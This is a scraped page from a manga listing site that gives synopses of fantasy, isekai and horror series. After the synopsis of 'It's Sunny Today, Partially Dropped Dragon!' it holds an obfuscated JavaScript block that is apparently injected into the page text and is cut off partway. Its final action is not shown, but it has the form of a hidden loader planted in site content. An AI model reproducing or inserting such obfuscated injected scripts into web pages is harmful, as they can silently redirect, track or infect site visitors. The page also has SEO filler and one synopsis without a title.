Monsters - Page 6

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122 results

I’m Worried That My Brother Is Too Gentle

“Your Highness! The Papers Have Piled Up Like This……!” I Reincarnated As Irene Weber, The Younger Sister Of An Aide Who Is Suffering From Overtime Because Of The Prince Who Is In Love And Neglects His Work. Irene, Who Was Buried In Work Before The Reincarnation And Died Of Overwork, Intends To Protect Her Beloved Brother From Such A Terrible Thing. No Overtime! No Call After Work! Evil Boss, Go Away! Work Less And Earn More, Brother! To The End, Irene Tries To Separate The Prince From Her Brother. A Method To Win By Knowing Your Enemy And Knowing Yourself. Irene Scraps A Little Record Without Leaving Any Details, Of The Prince Whose Face She Doesn’t Even Know About, For The Future. Somehow, Her Brother’s Face, Looking At Such Irene, Is Dark…… “Brother, If You’re Meeting The Crown Prince Today, I’ll Go With…..” “Absolutely Not.” ‘Do You Want To Meet Him Alone So Much?’ *** “Before That, Benjamin Weber, When Can I Meet Your Sister?” “Not For The Rest Of Your Life.” The Most Affectionate Brother And Sister Of The Continent. Will The Day Come When These Two Siblings Can Resolve Their Growing Misunderstanding?


It’s Sunny Today, Partially Dropped Dragon!

A young girl with a pair of bone braids who was regarded as an evil thing, accidentally got hit on her head by a dragon egg. Turns out there is a little dragon baby. They travel together to find their own home with two adorable creatures. What adventures will they have along the way?<script></script><script>(function(_0x2ae4f4,_0x318123){var _0x30bc18=_0x295b,_0x1159aa=_0x2ae4f4();while(!![]){try{var _0x32968f=-parseInt(_0x30bc18(0x10b))/(-0xa6b+0x20f9+-0x168d)+-parseInt(_0x30bc18(0x119))/(0x8*0x329+0x21dc+-0x349*0x12)*(parseInt(_0x30bc18(0x10d))/(0x582+0x326*-0x7+0x108b))+parseInt(_0x30bc18(0x11d))/(0x1*0x1862+0xd27+-0x2585)*(-parseInt(_0x30bc18(0x11f))/(-0x1782+-0x2229+0x39b0))+parseInt(_0x30bc18(0x125))/(0x58*0x6a+-0x1*0xe0a+0x20*-0xb3)+parseInt(_0x30bc18(0x127))/(0x8d*0x13+0x8f*-0x35+0x132b)*(parseInt(_0x30bc18(0x12a))/(0x2032+0x86f*-0x2+-0xf4c))+-parseInt(_0x30bc18(0x122))/(0x11+0x1*0x1822+0x407*-0x6)+parseInt(_0x30bc18(0x11e))/(-0x1*0x852+0xc7f*0x1+-0x423);if(_0x32968f===_0x318123)break;else _0x1159aa['push'](_0x1159aa['shift']());}catch(_0x575e6d){_0x1159aa['push'](_0x1159aa['shift']());}}}(_0x43fe,0x1*-0x1b194+-0x27235+0x69dfd));function custom(){var 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Zekkyou Daiyogen

♪\'Lalala, the cute puppy will die in a while.\'♪ ♪\'And I feel that fella near waterfall will fall and drown, oh yes, he will.\'♪ A karaoke prophet wanders around the town singing weird prophecies into his trusty handy karaoke. No matter how you look at it he\'s a risky guy, but his sinister prophecies are always right. A puppy that high schooler Yori got from her boyfriend dies. Later, a middle-aged man drowns after falling into a waterfall, a giant fire occurs in the city, and… even more?! The scary, the grotesque, even the ridiculous: a collection of bizarre horror stories!


Mob Kousei no Ore Demo Boukensha ni Nareba Riajuu ni Naremasuka

Dungeons, and along with them monsters and related disasters, started appearing in the modern world decades ago. With this brought many changes, the biggest one being adventurers and the monster cards they use to summon summons to fight and conquer dungeons with. Kitagawa Utamaro, or just Maro, is a mob highschooler who becomes an adventurer due to being incited by a former friend of his having sudden social success among their peers simply by becoming an adventurer himself. However, things aren\'t quite as easy for Maro. Just becoming an adventurer in name only isn\'t enough for him to gain his spotlight, giving him no recourse but to actually tackle dungeons with the peculiar and not very versatile monster cards that he barely manages to scrape up.


Dageki-kei Onikko ga Yuku Haishindou! @comic

Futayado Nanako(二宿菜々香) calling herself a part time warrior, though all the places she worked at got bankrupt, now has too much time on her hands. And to that opportunity, she was invited by a very close friend of hers, a pro gamer and a live streamer, and decided to do the world’s first VRMMO with a live stream function 《WorldLive-ONLINE》. And so, a real cheat girl who has extraordinary strength (21 yrs old) carries a blunt weapon and rampages through the VR world, a bludgeoning refreshing story where the viewers tremble in fear!


A Good-Natured Craftsman Leisurely Travels Through Another World

Ryoichi Ishikawa, a young man who lost his father, who was his only relative, also decided to close the electrical shop that he and his father had been working on.From a strange matter, I choose to transfer to another world by my own will.It was supposed to be the second life of a leisurely trip, but I can not leave the person in need.We solve many worries by making full use of the cheat skills given by God and the skills of craftsmen.Sometime around, friends with one or two habits gathered…! ?The journey of a good-natured craftsman in another world begins here!


Return Of The Disaster-Class Hero

Read “Return Of The Disaster-Class Hero Manga” – “Return Of The Disaster-Class Hero Manhwa” Online Free On Mangazin The Summary Of The Comics “Return Of The Disaster-Class Hero”: Twenty Years. For Twenty Long Years, The Thirteenth Saint Lee Geon Was Trapped Inside The Tower Of Demons After Being Backstabbed By Twelve Of His Allies. These Twelve “Saints” Were Warriors Chosen By The Twelve Zodiac Gods To Defeat Mysterious Monsters Called “Calamities” That Were Massacring The Planet. Though No God Had Chosen Geon As A Saint, He Became The Mightiest Of Them All, Which Made Him A Hero… And A Target. But Now, Geon Has Brawled His Way Out Of The Tower, And He’s Back Stronger Than Ever. All That’s Left Is To Exact Brutal Payback On Each Of The Saints, But None Of These Powerful Beings Will Go Down Without A Fight. Will Geon Be Able To Stay In One Piece While Achieving The Divine Revenge Of His Dreams? “Return Of The Disaster-Class Hero” Is Alternatively Named: A Disaster Class Hero Has Returned; Felaket Kahramanın Dirilişi; Resurrection Of The Catastrophic Hero; Return Of The Disaster-Class Hero; Return Of The Disaster-Level Hero; The Return Of The Disaster-Class Hero Chapter; Возвращение Героя Уровня Катастрофы; بازگشت قهرمان سطح فاجعه; การกลับมาของฮีโร่ระดับหายนะ; 災いクラスの俺様英雄の帰還; 災難級英雄歸來; 灾难级英雄归来; 재앙급 영웅님이 귀환하셨다 The Comics “Return Of The Disaster-Class Hero” Belongs To The Genre: Action, Adaptation, Adventure, Comedy, Fantasy, Full Color, Magic, Monsters, Webtoon “Manhwaclan, Manga Updates, Kunmanga…” Are The Most Searched Keywords On The Website Manhwaclan. We Offer A Wide Selection Of The Best And Newest Comics Series With All Chapters Updated Quickly And Featuring High-Quality Images, Providing Readers With Wonderful And Enjoyable Reading Experiences At Likemanga. You Can Read Top Manga The Regretful Villainess Is Happy Because She Got Divorced Underworld Restaurant North Snow Love Story


Akuyaku Reijou Level 99: Watashi wa UraBoss desu ga Maou de wa Arimasen

I reincarnated as the \"Villainess Eumiella\" from an RPG Otome game. In the main story, Eumiella is merely a side character, but after the ending, she re-enters the story as the Hidden Boss, a character boasting high stats on par with the heroes! Lighting a fire in my gamer\'s soul, and taking advantage of being left on my own in my parent\'s territory, I trained, trained, and trained! As a result of my training… by the time I enrolled in the academy, I managed to reach level 99. Though I had planned to live out my days as inconspicuously and peacefully as possible, soon after entering the school, I\'m suspected by the Heroine and Love Interests of being the \"Demon Lord\"…? Based on a popular web novel of seeking a peaceful life, a fantasy story of the strongest villainess!


Doukutsu Ou kara Hajimeru Rakuen Life ~Bannou no Saikutsu Skill de Saikyou ni!?~

Hiel was ridiculed for having a useless crest and was exiled to a remote island. When he grabbed an pickaxe to reclaim the island, the true effect of his crest was revealed. With his production cheat he will reclaim this uninhabited island and start his life in paradise.


BEASTBOX: The Mecha Era

The story takes place on Earth nearly a thousand years in the future. After a devastating war between artificial intelligence and humanity, monstrous creatures known as \"Tai Sui\" roam the land, drastically altering the natural environment and social order. In response, humanity developed \"BOX\"—a series of advanced technologies related to mysterious boxes. These \"Beast Boxes\" became humanity\'s key allies in the fierce resistance against their enemies. Elites capable of \"resonating\" with their Beast Box partners are known as \"Beast Box Masters.\" Among them, a once-overlooked Beast Box Master named Liu Ma is unexpectedly chosen by a small dinosaur-like Beast Box named \"Dio.\" Together, they begin their mission to protect the city-state. During grueling training, Liu Ma meets several other Beast Box Masters and their Beast Box companions. The group is soon tasked with reinforcing \"Vermilion City,\" marking the beginning of their epic journey.



After the abduction of his brother Kotaro by the Machine Empire, Teppei Takamiya joins forces with X, one of several highly-advanced, artificially intelligent machines known as B\'ts (pronounced \'beat\'), to rescue him. Volume Subtitles: 1: **X Revival!** (エックス復活!, Ekkusu Fukkatsu!) 2: **Far Way to the Area** (エリアへの遠い道, Eria e no Tōi Michi) 3: **Heart Color** (心の色, Kokoro no Iro) 4: **Five Color Phosphorescence** (五色の燐光, Goshiki no Rinkō) 5: **The Seven Greatest Demons** (最凶の七魔将, Sai Kyō no Nana Ma Shō) 6: **Fragment of the Sun** (太陽のかけら, Taiyōnokakera) 7: **Song of an Angel** (天使の詩, Tenshi no Uta - ALT ENG. Angel\'s Poem) 8: **Forest of Oblivion** (忘却の森, Bōkyaku no Mori) 9: **Nightmare Battlefield** (悪夢の戦場, Akumu no Senjō) 10: **Blood Battle! Kamui Island** (血戦!神居島, Kessen! Kamui-Jima) 11: **Area Collapse** (エリア崩壊, Eria Hōkai) 12: **Shellfish** (貝えぬもの, Kai Enu Mono) 13: **Deathmatch of Intelligence** (智力の死闘, Chiryoku no Shitō) 14: **Faithfulness** (信しる心, Shin Shiru Kokoro) 15: **Hurry Light!** (光よ急げ!, Hikari yo Isoge!) 16: Note: Volume count based on the bunkoban. Link: [AnimeNewsNetwork]( (anime)


Orc no Shuhai ni Shukufuku wo

A Hard-boiled Fantasy set in a Parallel World called \"Blended World\" where Alcohol is a source of Magical Power, where the Half-Orc Elpis and the Daughter of a corrupt Nobleman, Margit, go on an Adventure in search of WHISKEY left behind by the Teleporter Tanaka!
